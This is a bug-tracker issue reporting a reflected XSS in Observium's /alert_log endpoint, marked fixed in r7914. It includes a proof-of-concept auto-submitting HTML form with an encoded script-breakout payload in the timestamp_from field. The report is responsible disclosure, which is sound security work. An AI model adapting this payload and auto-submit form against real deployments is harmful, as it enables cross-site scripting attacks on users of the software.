[OBS-1868] [Security] - Reflected XSS on /alert_log - Observium

Details

Type: Bug
Resolution: Fixed
Priority: Major
Fix Version/s: Professional Edition
Affects Version/s: Community Edition
Component/s: Security, Web Interface
Labels:
None

Description

Hello,

Parameters "timestamp_from" and "timestamp_to" on a POST call /alert_log/alert_log/ seems to be vulnerable to Reflected Cross Site Scripting Vulnerability.

Proof Of Concept Code:

<form style="display:none" action="http://192.168.2.10/alert_log/alert_log/" method="POST">

    <input name="timestamp_from" value="&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(1)&lt;/scRipt&gt;"/>

    <input name="timestamp_to" value=""/>

    <input name="device_id%5b%5d" value="3"/>

    <input name="alert_test_id%5b%5d" value="3"/>

    <input name="log_type%5b%5d" value="ALERT_NOTIFY"/>

</form>

<script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>

Regards
Himanshu

Attachments

Activity

[OBS-1868] [Security] - Reflected XSS on /alert_log

Himanshu Das added a comment - 2016/06/10 05:05 AM

@Mike Stupalov

Could you please let me know?

Himanshu Das added a comment - 2016/06/10 05:05 AM @Mike Stupalov Could you please let me know?

Himanshu Das added a comment - 2016/06/08 09:50 PM

Hello Mike Stupalov,

Thanks for speedy fix.

I also want to know if there will be CVE assigned for this bug?

Regards
Himanshu

Himanshu Das added a comment - 2016/06/08 09:50 PM Hello Mike Stupalov, Thanks for speedy fix. I also want to know if there will be CVE assigned for this bug? Regards Himanshu

Mike Stupalov added a comment - 2016/06/08 09:43 PM

Thank you for report!

Fixed in r7914.

Mike Stupalov added a comment - 2016/06/08 09:43 PM Thank you for report! Fixed in r7914.

People

Assignee:: Mike Stupalov

Reporter:: Himanshu Das

Votes:: 0 Vote for this issue

Watchers:: 2 Start watching this issue

Dates

Created:: 2016/06/08 05:27 PM

Updated:: 2016/07/10 02:10 AM

Resolved:: 2016/06/08 09:43 PM